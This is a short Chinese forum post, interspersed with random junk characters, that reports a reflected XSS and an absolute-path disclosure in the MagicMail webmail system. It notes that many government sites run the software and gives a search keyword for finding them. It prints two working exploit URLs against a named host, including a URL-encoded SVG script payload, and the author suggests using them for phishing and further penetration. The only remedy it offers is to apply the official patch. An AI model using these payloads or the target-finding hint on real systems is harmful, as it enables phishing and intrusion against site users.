今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
* _1 s3 p5 F% d2 k$ x. G+ S4 ]
: k' e N3 Q Q* u - a% u. b+ Z0 z9 @$ f
包含 一个反射性XSS 以及 绝对路径泄漏 T# x5 |: s1 }4 \1 H1 S
看了看 貌似全部是linux的。
! i, @" ]! @5 F. w: {0 [$ }
! z% F7 Q" ~/ k" Z" k- x8 O2 Z关键字:迈捷邮件系统 by MagicMail8 ^& ?6 Q' m3 G5 ~2 r* p4 ^* l
0 S& l" `5 x: _/ V/ i% a" G可以看到很多政府网站都用这个邮件系统
3 X2 F. F8 ?+ G' r2 W" q% B1 V, \# f; @/ ^- G4 X( h
绝对路径 http://madman.in/index.php?login_type=declare&language=
# `" e% w0 Z# J% _/ W$ J+ O
# Z% B X$ E5 t
$ }/ p# q4 T/ s3 u, G2 K" a/ W4 n: o8 y9 `. c/ J
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
3 d2 m" P1 n, [2 [
1 M e w, D' S$ T0 k1 I- O2 n F' l* E
0 F+ N! p! i8 Y( u
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等6 P* G- y. r+ L
\/ o% }! T# K% A. O修复方案:看官方补丁吧。: x! a6 ]' t3 D1 v; `
|